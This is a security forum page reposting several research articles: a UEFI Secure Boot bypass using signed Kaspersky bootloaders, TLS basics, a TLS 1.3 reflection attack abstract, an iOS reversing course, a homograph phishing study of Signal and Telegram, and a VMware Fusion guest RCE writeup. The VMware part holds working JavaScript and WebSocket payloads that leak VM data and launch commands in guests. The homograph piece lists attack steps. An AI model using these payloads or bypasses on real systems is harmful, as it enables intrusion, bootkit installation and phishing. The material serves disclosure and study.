Jump to content

Leaderboard

Popular Content

Showing content with the highest reputation on 04/08/19 in all areas

  1. Spala cu benzina si usuca cu bricheta...
    3 points
  2. La ce nivel au ajuns unii... Sa reproduci instructiuni prin mov...
    3 points
  3. Cat am cautat anul trecut o inregistrare cu prezentarea asta, dar am gasit doar pdf-ul. Multumesc mult.
    1 point
  4. ValdikSS April 1, 2019 at 01:24 PM Exploiting signed bootloaders to circumvent UEFI Secure Boot UEFI, Information Security Русская версия этой статьи. Modern PC motherboards' firmware follow UEFI specification since 2010. In 2013, a new technology called Secure Boot appeared, intended to prevent bootkits from being installed and run. Secure Boot prevents the execution of unsigned or untrusted program code (.efi programs and operating system boot loaders, additional hardware firmware like video card and network adapter OPROMs). Secure Boot can be disabled on any retail motherboard, but a mandatory requirement for changing its state is physical presence of the user at the computer. It is necessary to enter UEFI settings when the computer boots, and only then it's possible to change Secure Boot settings. Most motherboards include only Microsoft keys as trusted, which forces bootable software vendors to ask Microsoft to sign their bootloaders. This process include code audit procedure and justification for the need to sign their file with globally trusted key if they want the disk or USB flash to work in Secure Boot mode without adding their key on each computer manually. Linux distributions, hypervisors, antivirus boot disks, computer recovery software authors all have to sign their bootloaders in Microsoft. I wanted to make a bootable USB flash drive with various computer recovery software that would boot without disabling Secure Boot. Let's see how this can be achieved. Signed bootloaders of bootloaders So, to boot Linux with Secure Boot enabled, you need a signed bootloader. Microsoft forbid to sign software licensed under GPLv3 because of tivoization restriction license rule, therefore >GRUB cannot be signed. To address this issue, Linux Foundation released PreLoader and Matthew Garrett made shim—small bootloaders that verify the signature or hash of a single file and execute it. PreLoader and shim do not use UEFI db certificate store, but contain a database of allowed hashes (PreLoader) or certificates (shim) inside the executable file. Both programs, in addition to automatically executing trusted files, allow you to run any previously untrusted programs in Secure Boot mode, but require the physical presence of the user. When executed for the first time, you need to select a certificate to be added or the file to be hashed in the graphical interface, after which the data is added into a special NVRAM variable on the motherboard which is not accessible from the loaded operating system. Files become trusted only for these pre-loaders, not for Secure Boot in general, and still couldn't be loaded without PreLoader or shim. Untrusted software first boot with shim. All modern popular Linux distributions use shim due to certificate support, which makes it easy to provide updates for the main bootloader without the need for user interaction. In general, shim is used to run GRUB2 — the most popular bootloader in Linux. GRUB2 To prevent signed bootloader abuse with malicious intentions, Red Hat created patches for GRUB2 that block «dangerous» functions when Secure Boot is enabled: insmod/rmmod, appleloader, linux (replaced by linuxefi) ,multiboot, xnu, memrw, iorw. The chainloader module, which loads arbitrary .efi-files, introduced its own custom internal .efi (PE) loader without using the UEFI LoadImage/StartImage functions, as well as the validation code of the loaded files via shim, in order to preserve the ability to load files trusted by shim but not trusted in terms of UEFI. It's not exactly clear why this method is preferable—UEFI allows one to redefine (hook) UEFI verification functions, this is how PreLoader works, and indeed in the very shim feature is presented but disabled by default. Anyway, using the signed GRUB from some Linux distribution does not suit our needs. There are two ways to create a universal bootable flash drive that would not require adding the keys of each executable file to the trusted files: Use modded GRUB with internal EFI loader, without digital signature vertification or module restrictions; Use custom pre-loader (the second one) which hook UEFI file vertification functions (EFI_SECURITY_ARCH_PROTOCOL.FileAuthenticationState, EFI_SECURITY2_ARCH_PROTOCOL.FileAuthentication) The second method is preferable as executed software can load and start another software, for example, UEFI shell can execute any program. The first method does not provide this, allowing only GRUB to execute arbitrary files. Let's modify PreLoader by removing all unnecessary features and patch verification code to allow everything. Disk architecture is as follows: ______ ______ ______ ╱│ │ ╱│ │ ╱│ │ /_│ │ → /_│ │ → /_│ │ │ │ → │ │ → │ │ │ EFI │ → │ EFI │ → │ EFI │ │_______│ │_______│ │_______│ BOOTX64.efi grubx64.efi grubx64_real.efi (shim) (FileAuthentication (GRUB2) override) ↓↓↓ ↑ ↑ ______ ↑ ╱│ │ ║ /_│ │ ║ │ │ ═══════════╝ │ EFI │ │_______│ MokManager.efi (Key enrolling tool) This is how Super UEFIinSecureBoot Disk has been made. Super UEFIinSecureBoot Disk is a bootable image with GRUB2 bootloader designed to be used as a base for recovery USB flash drives. Key feature: disk is fully functional with UEFI Secure Boot mode activated. It can launch any operating system or .efi file, even with untrusted, invalid or missing signature. The disk could be used to run various Live Linux distributions, WinPE environment, network boot, without disabling Secure Boot mode in UEFI settings, which could be convenient for performing maintenance of someone else's PC and corporate laptops, for example, with UEFI settings locked with a password. The image contains 3 components: shim pre-loader from Fedora (signed with Microsoft key which is pre-installed in most motherboards and laptops), modified Linux Foundation PreLoader (disables digital signature verification of executed files), and modified GRUB2 loader. On the first boot it's necessary to select the certificate using MokManager (starts automatically), after that everything will work just as with Secure Boot disabled—GRUB loads any unsigned .efi file or Linux kernel, executed EFI programs can load any other untrusted executables or drivers. To demonstrate disk functions, the image contains Super Grub Disk (a set of scripts to search and execute OS even if the bootloader is broken), GRUB Live ISO Multiboot (a set of scripts to load Linux Live distros directly from ISO file), One File Linux (the kernel and initrd in a single file, for system recovery) and several UEFI utilities. The disk is also compatible with UEFI without Secure Boot and with older PCs with BIOS. Signed bootloaders I was wondering is it possible to bypass first boot key enrollment through shim. Could there be some signed bootloaders that allow you to do more than the authors expected? As it turned out—there are such loaders. One of them is used in Kaspersky Rescue Disk 18—antivirus software boot disk. GRUB from the disk allows you to load modules (the insmod command), and module in GRUB is just an executable code. The pre-loader on the disk is a custom one. Of course, you can't just use GRUB from the disk to load untrusted code. It is necessary to modify the chainloader module so that GRUB does not use the UEFI LoadImage/StartImage functions, but instead self-loads the .efi file into memory, performs relocation, finds the entry point and jumps to it. Fortunately, almost all the necessary code is present in Red Hat GRUB Secure Boot repository, the only problem—PE header parser is missing. GRUB gets parsed header from shim, in a response to a function call via a special protocol. This could be easily fixed by porting the appropriate code from the shim or PreLoader to GRUB. This is how Silent UEFIinSecureBoot Disk has been made. The final disk architecture looks as follows: ______ ______ ______ ╱│ │ ╱│ │ ╱│ │ /_│ │ /_│ │ → /_│ │ │ │ │ │ → │ │ │ EFI │ │ EFI │ → │ EFI │ │_______│ │_______│ │_______│ BOOTX64.efi grubx64.efi grubx64_real.efi (Kaspersky (FileAuthentication (GRUB2) Loader) override) ↓↓↓ ↑ ↑ ______ ↑ ╱│ │ ║ /_│ │ ║ │ │ ═══════════╝ │ EFI │ │_______│ fde_ld.efi + custom chain.mod (Kaspersky GRUB2) The end In this article we proved the existence of not enough reliable bootloaders signed by Microsoft key, which allows booting untrusted code in Secure Boot mode. Using signed Kaspersky Rescue Disk files, we achieved a silent boot of any untrusted .efi files with Secure Boot enabled, without the need to add a certificate to UEFI db or shim MOK. These files can be used both for good deeds (for booting from USB flash drives) and for evil ones (for installing bootkits without computer owner consent). I assume that Kaspersky bootloader signature certificate will not live long, and it will be added to global UEFI certificate revocation list, which will be installed on computers running Windows 10 via Windows Update, breaking Kaspersky Rescue Disk 18 and Silent UEFIinSecureBoot Disk. Let's see how soon this would happen. Super UEFIinSecureBoot Disk download: https://github.com/ValdikSS/Super-UEFIinSecureBoot-Disk Silent UEFIinSecureBoot Disk download (ZeroNet Git Center network): http://127.0.0.1:43110/1KVD7PxZVke1iq4DKb4LNwuiHS4UzEAdAv/ About ZeroNet Sursa: https://habr.com/en/post/446238/
    1 point
  5. TLS Security 1: What Is SSL/TLS Posted on April 3, 2019 by Agathoklis Prodromou Secure Sockets Layer (SSL) and Transport Layer Security (TLS) are cryptographic security protocols. They are used to make sure that network communication is secure. Their main goals are to provide data integrity and communication privacy. The SSL protocol was the first protocol designed for this purpose and TLS is its successor. SSL is now considered obsolete and insecure (even its latest version), so modern browsers such as Chrome or Firefox use TLS instead. SSL and TLS are commonly used by web browsers to protect connections between web applications and web servers. Many other TCP-based protocols use TLS/SSL as well, including email (SMTP/POP3), instant messaging (XMPP), FTP, VoIP, VPN, and others. Typically, when a service uses a secure connection the letter S is appended to the protocol name, for example, HTTPS, SMTPS, FTPS, SIPS. In most cases, SSL/TLS implementations are based on the OpenSSL library. SSL and TLS are frameworks that use a lot of different cryptographic algorithms, for example, RSA and various Diffie–Hellman algorithms. The parties agree on which algorithm to use during initial communication. The latest TLS version (TLS 1.3) is specified in the IETF (Internet Engineering Task Force) document RFC 8446 and the latest SSL version (SSL 3.0) is specified in the IETF document RFC 6101. Privacy & Integrity SSL/TLS protocols allow the connection between two mediums (client-server) to be encrypted. Encryption lets you make sure that no third party is able to read the data or tamper with it. Unencrypted communication can expose sensitive data such as user names, passwords, credit card numbers, and more. If we use an unencrypted connection and a third party intercepts our connection with the server, they can see all information exchanged in plain text. For example, if we access the website administration panel without SSL, and an attacker is sniffing local network traffic, they see the following information. The cookie that we use to authenticate on our website is sent in plain text and anyone who intercepts the connection can see it. The attacker can use this information to log into our website administration panel. From then on, the attacker’s options expand dramatically. However, if we access our website using SSL/TLS, the attacker who is sniffing traffic sees something quite different. In this case, the information is useless to the attacker. Identification SSL/TLS protocols use public-key cryptography. Except for encryption, this technology is also used to authenticate communicating parties. This means, that one or both parties know exactly who they are communicating with. This is crucial for such applications as online transactions because must be sure that we are transferring money to the person or company who are who they claim to be. When a secure connection is established, the server sends its SSL/TSL certificate to the client. The certificate is then checked by the client against a trusted Certificate Authority, validating the server’s identity. Such a certificate cannot be falsified, so the client may be one hundred percent sure that they are communicating with the right server. Perfect Forward Secrecy Perfect forward secrecy (PFS) is a mechanism that is used to protect the client if the private key of the server is compromised. Thanks to PFS, the attacker is not able to decrypt any previous TLS communications. To ensure perfect forward secrecy, we use new keys for every session. These keys are valid only as long as the session is active. TLS Security 2 Learn about the history of SSL/TLS and protocol versions: SSL 2.0, SSL 3.0, TLS 1.0, TLS 1.1, and TLS 1.2. TLS Security 3 Learn about SSL/TLS terminology and basics, for example, encryption algorithms, cipher suites, message authentication, and more. TLS Security 4 Learn about SSL/TLS certificates, certificate authorities, and how to generate certificates. TLS Security 5 Learn how a TLS connection is established including key exchange, TLS handshakes, and more. TLS Security 6 Learn about TLS vulnerabilities and attacks such as POODLE, BEAST, CRIME, BREACH, and Heartbleed. Agathoklis Prodromou Web Systems Administrator/Developer Akis has worked in the IT sphere for more than 13 years, developing his skills from a defensive perspective as a System Administrator and Web Developer but also from an offensive perspective as a penetration tester. He holds various professional certifications related to ethical hacking, digital forensics and incident response. Sursa: https://www.acunetix.com/blog/articles/tls-security-what-is-tls-ssl-part-1/
    1 point
  6. Selfie: reflections on TLS 1.3 with PSK Nir Drucker and Shay Gueron University of Haifa, Israel,andAmazon, Seattle, USA Abstract. TLS 1.3 allows two parties to establish a shared session keyfrom an out-of-band agreed Pre Shared Key (PSK). The PSK is usedto mutually authenticate the parties, under the assumption that it isnot shared with others. This allows the parties to skip the certificateverification steps, saving bandwidth, communication rounds, and latency.We identify a security vulnerability in this TLS 1.3 path, by showing anew reflection attack that we call “Selfie”. TheSelfieattack breaks themutual authentication. It leverages the fact that TLS does not mandateexplicit authentication of the server and the client in every message.The paper explains the root cause of this TLS 1.3 vulnerability, demon-strates theSelfieattack on the TLS implementation of OpenSSL andproposes appropriate mitigation.The attack is surprising because it breaks some assumptions and uncoversan interesting gap in the existing TLS security proofs. We explain the gapin the model assumptions and subsequently in the security proofs. Wealso provide an enhanced Multi-Stage Key Exchange (MSKE) model thatcaptures the additional required assumptions of TLS 1.3 in its currentstate. The resulting security claims in the case of external PSKs areaccordingly different. Sursa: https://eprint.iacr.org/2019/347.pdf
    1 point
  7. Reverse Engineering iOS Applications Welcome to my course Reverse Engineering iOS Applications. If you're here it means that you share my interest for application security and exploitation on iOS. Or maybe you just clicked the wrong link 😂 All the vulnerabilities that I'll show you here are real, they've been found in production applications by security researchers, including myself, as part of bug bounty programs or just regular research. One of the reasons why you don't often see writeups with these types of vulnerabilities is because most of the companies prohibit the publication of such content. We've helped these companies by reporting them these issues and we've been rewarded with bounties for that, but no one other than the researcher(s) and the company's engineering team will learn from those experiences. This is part of the reason I decided to create this course, by creating a fake iOS application that contains all the vulnerabilities I've encountered in my own research or in the very few publications from other researchers. Even though there are already some projects[^1] aimed to teach you common issues on iOS applications, I felt like we needed one that showed the kind of vulnerabilities we've seen on applications downloaded from the App Store. This course is divided in 5 modules that will take you from zero to reversing production applications on the Apple App Store. Every module is intended to explain a single part of the process in a series of step-by-step instructions that should guide you all the way to success. This is my first attempt to creating an online course so bear with me if it's not the best. I love feedback and even if you absolutely hate it, let me know; but hopefully you'll enjoy this ride and you'll get to learn something new. Yes, I'm a n00b! If you find typos, mistakes or plain wrong concepts please be kind and tell me so that I can fix them and we all get to learn! Modules Prerequisites Introduction Module 1 - Environment Setup Module 2 - Decrypting iOS Applications Module 3 - Static Analysis Module 4 - Dynamic Analysis and Hacking Module 5 - Binary Patching Final Thoughts Resources License Copyright 2019 Ivan Rodriguez <ios [at] ivrodriguez.com> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. Disclaimer I created this course on my own and it doesn't reflect the views of my employer, all the comments and opinions are my own. Disclaimer of Damages Use of this course or material is, at all times, "at your own risk." If you are dissatisfied with any aspect of the course, any of these terms and conditions or any other policies, your only remedy is to discontinue the use of the course. In no event shall I, the course, or its suppliers, be liable to any user or third party, for any damages whatsoever resulting from the use or inability to use this course or the material upon this site, whether based on warranty, contract, tort, or any other legal theory, and whether or not the website is advised of the possibility of such damages. Use any software and techniques described in this course, at all times, "at your own risk", I'm not responsible for any losses, damages, or liabilities arising out of or related to this course. In no event will I be liable for any indirect, special, punitive, exemplary, incidental or consequential damages. this limitation will apply regardless of whether or not the other party has been advised of the possibility of such damages. Privacy I'm not personally collecting any information. Since this entire course is hosted on Github, that's the privacy policy you want to read. [^1] I love the work @prateekg147 did with DIVA and OWASP did with iGoat. They are great tools to start learning the internals of an iOS application and some of the bugs developers have introduced in the past, but I think many of the issues shown there are just theoretical or impractical and can be compared to a "self-hack". It's like looking at the source code of a webpage in a web browser, you get to understand the static code (HTML/Javascript) of the website but any modifications you make won't affect other users. I wanted to show vulnerabilities that can harm the company who created the application or its end users. Sursa: https://github.com/ivRodriguezCA/RE-iOS-Apps
    1 point
  8. What you see is not what you get: when homographs attack homographs, telegram, signal, security research — 01 April 2019 Introduction Since the introduction of Unicode in domain names (known as Internationalized Domain Names, or simply IDN) by ICANN over two decades ago, a series of brand new security implications were also brought into light together with the possibility of registering domain names using different alphabets and Unicode characters. When researching the feasibility of phishing and other attacks based on homographs and IDNs, mainly in the context of web application penetration testing, we stumbled upon a few curious cases where they also affected mobile applications. We then decided to investigate the prevalence of this class of vulnerability against mobile instant messengers, especially those security-oriented. This blog post offers a brief overview about homograph attacks, highlights its risks and presents a chain of two practical exploits against Signal, Telegram and Tor Browser that could lead to nearly impossible to detect phishing scenarios and also situations where more powerful exploits could be used against an opsec-aware target. What are homoglyphs and homographs? It is not uncommon for characters that belong to different alphabets to look alike. These are called homoglyphs and sometimes depending on the font they happen to get rendered in a visually indistinguishably way, making it impossible for a user to tell the difference between them. For the naked eye 'a' and 'а' looks the same (a homoglyph), but the former belongs to the Latin script and the latter to Cyrillic. While for the untrained human eye it is hard to distinguish between both of them, they may get interpreted entirely different by computers. Homographs are two strings that seem to be the same but are in fact different. Think for instance, the English word "lighter" is and written the same but has a different meaning depending on the context it is used - it can mean "a device for lighting a fire", as a noun, or the opposite of "heavier", as a verb. The strings blazeinfosec.com and blаzeinfosec.com are oftentimes rendered as homographs, but yield different results when transformed into a URL. Homoglyphs, and by extension homographs, exist among many different scripts. Latin, Greek and Cyrillic for example share numerous characters that either look exactly similar (e.g., A and А) or have a very close resemblance (e.g., P and Р). Unicode has a document that takes into consideration "confusable" characters, that have look-a-likes across different scripts. Font renderization and homoglyphs Depending on the font, the way it is rendered and also the size of the font in the display, homoglyphs and homographs may be shown either differently or completely indistinguishable from each other, as seen in CVE-2018-4277 and in the example put together by Xudong Zheng in April 2017, which highlighted the insufficient measures browsers applied against IDN homographs until then. Below are the strings https://www.apple.com (Latin) and https://www.аррӏе.com (Cyrillic) displayed in the font Tahoma, size 30: Below are the same strings now displayed in the font Bookman Old Style, size 30: The way they are rendered and displayed, Tahoma does not seem to distinguish between both of them, providing no visual indication to a user of a fraudulent website. Bookman Old Style, on the other hand, seems to at least render differently the 'l' and 'І', giving a small visual hint about the legitimacy of the URL. Internationalized Domain Names (IDN) and punycode With the advent of support for Unicode in major operating systems and applications and the fact the Internet gained popularity in countries that do not necessarily use Latin as their alphabet, in the late 1990's ICANN in introduced the first version of IDN. This meant that domain names could be represented in the characters of their native language, insted of being bound by ASCII characters. However, DNS systems do not understand Unicode and a strategy to adapt to ASCII-only systems was needed. Therefore, Punycode was invented to translate domain names containing Unicode symbols into ASCII, so DNS servers could work normally. For example, https://www.blazeinfosec.com and https://www.blаzeinfosec.com in ASCII will be: https://www.blazeinfosec.com https://www.xn--blzeinfosec-zij.com As the 'a' in the second URL is actually 'а' in Cyrillic, so a translation into Punycode is required. Registration of homograph domains Initially in Internationalized Domain Names version 1, it was possible to register a combination of ASCII and Unicode into the same domain. This clearly presented a security problem and it is no longer true since the adoption of IDN version 2 and 3, which further locked down the registration of Unicode domain names. Most notably, it instructed gTLDs to prevent the registration of domain names that contain mixed scripts (e.g., Latin and Kanji characters in the same string). Although many top-level domain registrars restrict mixed scripts, history have shown in practice the possibility to register similar looking domains in a single script - which is the currently allowed practice by many gTLD registrars. Just as an example, the domains apple.com and paypal.com have Cyrillic homograph counterparts and were registered by security researchers in the past as a proof of concept of homograph issues in web browsers. Logan McDonald wrote ha-finder a tool that takes the Top 1 million websites and checks if letters in each are confusable with Latin or decimal, performs a WHOIS lookup and tells you whether it is available for registration or not. Homograph attacks Although ICANN was aware of the potential risks of homograph attacks since the introduction of IDN, one of the first real demonstrations of a practical IDN homograph attack is believed to have been discovered in 2005 by 3ric Johanson of Shmoo Group. The details of the issue was described in this Bugzilla ticket and affected many other browsers at the time. Another implication of Unicode homographs, but not directly related to the issue described in this blog post, was the attack documented against Spotify in their engineering blog, where a researcher discovered how to take over user accounts due to the improper conversion and canonicalization of Unicode-based usernames in their ASCII counterparts. More recently similar phishing were spotted in the wild against users of the cryptocurrency exchange MyEtherWallet, Github and in 2018 Apple fixed a bug CVE-2018-4277 in Safari, discovered by Tencent Labs, where the small Latin letter 'ꝱ' (dum) was rendered in the URL bar exactly like the character 'd'. Browsers have different strategies to handle IDN. Depending on the configuration, some of them will show the Unicode in order to provide a more friendly user experience. They also have different IDN display algorithms - Google Chrome's algorithm can be found here. It performs checks on the gTLD where the domain is registered on, and also verifies if the characters are in a list of Cyrillic confusable. Firefox, including Tor Browser with its default configuration, implements a far less strict algorithm that will simply display Unicode characters in their intended scripts, even if they are Latin confusable. These are certainly not enough to protect users and it is not difficult to pull off a practical example: just click https://www.раураӏ.com to be taken to a website in which the URL bar will show https://www.paypal.com but it is not at all the original PayPal. This presents a clear problem for users of Firefox and consequently Tor Browser. Many attempts to change these two browsers behavior when displaying IDNs have happened in the past, including tickets for Firefox and for Tor Browser -- these tickets have been open since early 2017. Attacking Signal, Telegram and Tor Browser with homographs The vast majority of prior research on this topic has been centred around browsers and e-mail clients. Therefore, we decided to look into different vectors where homographs could be leveraged, whether fully or partially, for successful attacks. Oftentimes, the threat model of individuals that use privacy-oriented messenger platform such as Signal and Telegram includes not clicking links sent via SMS or instant messengers, as it has proven to be the initial attack vector in a chain of exploits to compromise a mobile target, for instance. As mentioned earlier in this article, depending on the font and the size used to display the text it may be rendered on the screen in a visually indistinguishable way, making it impossible for a human user to tell apart a legitimate URL from a malicious link. Attack steps Adversary acquires a homograph domain name similar to the attack suitable domain name Adversary hosts malicious content (e.g., phishing or a browser exploit) in the web server serving this URL Adversary sends a link containing a malicious, homograph URL to the target Target clicks the link, believing it to be a legitimate URL it trusts, given there is no way to visually tell apart legitimate and malicious URLs Malicious activity happens Below we can see how Signal Android and Desktop, respectively, rendered messages with links containing homograph characters: Telegram went as far as making the preview of the fake website, and rendered the link in a way impossible for a human to tell it is malicious: Until recently, many browsers have been vulnerable to these attacks and displayed homograph links in the URL bar in a Latin-looking fashion, as opposed to the expected Punycode. Firefox, on the other hand, by default tries to be user friendly and in many cases does not show Punycode, leaving its users vulnerable to such attacks. Tor Browser, as already mentioned, is based on Firefox and this allows for a full attack chain against users of Signal and Telegram. Given the privacy concerns and threat model of the users of these instant messengers, it is likely many of them will be using Tor Browser for their browsing, therefore making them vulnerable to a full-chain homograph attack. Signal + Tor Browser attack: Telegram + Tor Browser attack: The bugs we found in Signal and Telegram have been assigned CVE-2019-9970 and CVE-2019-10044, respectively. The advisories can be found in our Github advisories page. Other popular instant messengers, like Slack, Facebook Messenger and WhatsApp were not vulnerable to this class of attack during our experiments. Latest versions of WhatsApp go as far as showing a label in the link to warn users it can be malicious, where other messengers simply render the link un-clickable. Conclusion Confusable homographs are a class of attacks against Internet users that has been around for nearly two decades now since the advent of Unicode in domain names. The risks of homographs in computer security have been known and relatively well understood, yet we keep seeing homograph-related attacks resurfacing every now and then. Even though they have been around for a while, very little attention has been given to this class of attacks as they are generally seen as not so harmful, and usually falls into the category of social engineering - which is not always part of threat models of many applications and it is frequently assumed the user should take care of it; but we believe applications can do better. Finally, application security teams should step up their game and be proactive at preventing such attacks from happening (like Google did with Chrome), instead of pointing the blame to registrars, relying on user awareness to not bite the bait or waiting for ICANN to come up with a magic solution to the problem. References [1] https://krebsonsecurity.com/2018/03/look-alike-domains-and-visual-confusion/ [2] https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/ [3] https://bugzilla.mozilla.org/show_bug.cgi?id=279099 [4] https://www.phish.ai/2018/03/13/idn-homograph-attack-back-crypto/ [5] https://dev.to/loganmeetsworld/homographs-attack--5a1p [6] https://www.unicode.org/Public/security/latest/confusables.txt [7] https://labs.spotify.com/2013/06/18/creative-usernames [8] https://xlab.tencent.com/en/2018/11/13/cve-2018-4277 [9] https://urlscan.io/result/0c6b86a5-3115-43d8-9389-d6562c6c49fa [10] https://www.xudongz.com/blog/2017/idn-phishing [11] https://github.com/loganmeetsworld/homographs-talk/tree/master/ha-finder [12] https://www.chromium.org/developers/design-documents/idn-in-google-chrome [13] https://wiki.mozilla.org/IDN_Display_Algorithm [14] https://www.ietf.org/rfc/rfc3492.txt [15] https://trac.torproject.org/projects/tor/ticket/21961 [16] https://bugzilla.mozilla.org/show_bug.cgi?id=1332714 Sursa: https://wildfire.blazeinfosec.com/what-you-see-is-not-what-you-get-when-homographs-attack/
    1 point
  9. VMware Fusion 11 - Guest VM RCE - CVE-2019-5514 published 03-31-2019 00:00:00 TL;DR You can run an arbitrary command on a VMware Fusion guest VM through a website without any priory knowledge. Basically VMware Fusion is starting up a websocket listening only on the localhost. You can fully control all the VMs (also create/delete snapshots, whatever you want) through this websocket interface, including launching apps. You need to have VMware Tools installed on the guest for launching apps, but honestly who doesn’t have it installed. So with creating a javascript on a website, you can interact with the undocumented API, and yes it’s all unauthenticated. Original discovery I saw a tweet a couple of weeks ago from @CodeColorist: CodeColorist (@CodeColorist) on Twitter, talking about this issue - he was the one discovering it, but I didn’t have time to look into this for a while. When I searched it again, that tweet was removed. I found the same tweet on his Weibo account (~Chinese Twitter): CodeColorist Weibo. This is the screenshot he posted: What you can see here is that you can execute arbitrary commands on a guest VM through a web socket interface, which is started by amsrv process. I would like to give him full credits for this, what I did later is just building on top of this information. AMSRV I used ProcInfoExample GitHub - objective-see/ProcInfoExample: example project, utilizing Proc Info library to monitor what kind of processes are starting up, when running VMware Fusion. When you start VMware both vmrest (VMware REST API) and amsrv will be started: 2019-03-05 17:17:22.434 procInfoExample[10831:7776374] process start: pid: 10936 path: /Applications/VMware Fusion.app/Contents/Library/vmrest user: 501 args: ( "/Applications/VMware Fusion.app/Contents/Library/amsrv", "-D", "-p", 8698 ) 2019-03-05 17:17:22.390 procInfoExample[10831:7776374] process start: pid: 10935 path: /Applications/VMware Fusion.app/Contents/Library/amsrv user: 501 args: ( "/Applications/VMware Fusion.app/Contents/Library/amsrv", "-D", "-p", 8698 ) They seem to be related, especially because you can reach some undocumented VMware REST API calls through this port. As you can control the Application Menu through the amsrv process, I think this is something like “Application Menu Service”. If we navigate to /Applications/VMware Fusion.app/Contents/Library/VMware Fusion Applications Menu.app/Contents/Resources we can find a file called app.asar, and at the end of the file there is a node.js implementation related to this websocket that listens on port 8698. It’s pretty nice that you have the source code available in this file, so we don’t need to do hardcore reverse engineering. If we look at the code it reveals that indeed the VMware Fusion Application Menu will start this amsrv process on port 8698, or if that is busy it will try the next available open and so on. const startVMRest = async () => { log.info('Main#startVMRest'); if (vmrest != null) { log.warn('Main#vmrest is currently running.'); return; } const execSync = require('child_process').execSync; let port = 8698; // The default port of vmrest is 8697 let portFound = false; while (!portFound) { let stdout = execSync('lsof -i :' + port + ' | wc -l'); if (parseInt(stdout) == 0) { portFound = true; } else { port++; } } // Let's store the chosen port to global global['port'] = port; const spawn = require('child_process').spawn; vmrest = spawn(path.join(__dirname, '../../../../../', 'amsrv'), [ '-D', '-p', port ]); We can find the related logs in the VMware Fusion Application Menu logs: 2019-02-19 09:03:05:745 Renderer#WebSocketService::connect: (url: ws://localhost:8698/ws ) 2019-02-19 09:03:05:745 Renderer#WebSocketService::connect: Successfully connected (url: ws://localhost:8698/ws ) 2019-02-19 09:03:05:809 Renderer#ApiService::requestVMList: (url: http://localhost:8698/api/internal/vms ) This confirms the web socket and also a rest API interface. REST API - Leaking VM info If we navigate to the URL above (http://localhost:8698/api/internal/vms), we will get a nicely formatted JSON with the details of our VMs: [ { "id": "XXXXXXXXXXXXXXXXXXXXXXXXXX", "processors": -1, "memory": -1, "path": "/Users/csaby/VM/Windows 10 x64wHVCI.vmwarevm/Windows 10 x64.vmx", "cachePath": "/Users/csaby/VM/Windows 10 x64wHVCI.vmwarevm/startMenu.plist", "powerState": "unknown" } ] This is already an information leak where an attacker can get information about our user ID, folders, and VM names, and their basic information. The code below can be used to display information. If we put this JS into any website, and a host running Fusion visits it, we can query the REST API. var url = 'http://localhost:8698/api/internal/vms'; //A local page var xhr = new XMLHttpRequest(); xhr.open('GET', url, true); // If specified, responseType must be empty string or "text" xhr.responseType = 'text'; xhr.onload = function () { if (xhr.readyState === xhr.DONE) { if (xhr.status === 200) { console.log(xhr.response); //console.log(xhr.responseText); document.write(xhr.response) } } }; xhr.send(null); If we look more closely on the code, we find these additional URLs that will leak further info: '/api/vms/' + vm.id + '/ip' - This will give you the internal IP of the VM, but it will not work on an encrypted VM or if it’s powered off. '/api/internal/vms/' + vm.id - This is the same info you get via the first URL discussed, just limiting info to one VM. Websocket - RCE with vmUUID This is the original POC published by @CodeColorist. <script> ws = new WebSocket("ws://127.0.0.1:8698/ws"); ws.onopen = function() { const payload = { "name":"menu.onAction", "object":"11 22 33 44 55 66 77 88-99 aa bb cc dd ee ff 00", "userInfo": { "action":"launchGuestApp:", "vmUUID":"11 22 33 44 55 66 77 88-99 aa bb cc dd ee ff 00", "representedObject":"cmd.exe" } }; ws.send(JSON.stringify(payload)); }; ws.onmessage = function(data) { console.log(JSON.parse(data.data)); ws.close(); }; </script> In this POC you need the UUID of the VM to to start an application. The vmUUID is the bios.uuid that you can find in the vmx file. The ‘problem’ with this is that you can’t leak the vmUUID and brute forcing it would be practically impossible. You need to have VMware Tools installed on the guest for this to work, but who doesn’t have it? If the VM is suspended or shutted down, VMware will nicely start it for us. Also the command will be queued until the user logs in, so even if the screen is locked we will be able to run this command once the user logged in. After some experimentation I noticed that if I remove the object and vmUUID elements, the code execution still happens with the last used VM, so there is some state information saved. Websocket - infoleak After starting reversion and following the traces what web sockets will call, and what are the other options in the code, it started to be clear that you have full access to the application menu, and you can fully control everything. Checking the VMware Fusion binary it becomes clear that you have other menus with other options. aMenuupdate: 00000001003bedd2 db "menu.update", 0 ; DATA XREF=cfstring_menu_update aMenushow: 00000001003bedde db "menu.show", 0 ; DATA XREF=cfstring_menu_show aMenuupdatehotk: 00000001003bede8 db "menu.updateHotKey", 0 ; DATA XREF=cfstring_menu_updateHotKey aMenuonaction: 00000001003bedfa db "menu.onAction", 0 ; DATA XREF=cfstring_menu_onAction aMenurefresh: 00000001003bee08 db "menu.refresh", 0 ; DATA XREF=cfstring_menu_refresh aMenusettings: 00000001003bee15 db "menu.settings", 0 ; DATA XREF=cfstring_menu_settings aMenuselectinde: 00000001003bee23 db "menu.selectIndex", 0 ; DATA XREF=cfstring_menu_selectIndex aMenudidclose: 00000001003bee34 db "menu.didClose", 0 ; DATA XREF=cfstring_menu_didClose These can be all called through the WebSocket. I didn’t went ahead to discover every single option on every single menu, but you can pretty much do whatever you want (make snapshots, start VMs, delete VMs, etc…) if you know the vmUUID. This was a problem as I didn’t figure out how to get that, and without it, it’s not that useful. The next interesting option was menu.refresh. If we use the following payload: const payload = { "name":"menu.refresh", }; We will get back some details about the VMs and pinned apps, etc.. { "key": "menu.update", "value": { "vmList": [ { "name": "Kali 2018 Master (2018Q4)", "cachePath": "/Users/csaby/VM/Kali 2018 Master (2018Q4).vmwarevm/startMenu.plist" 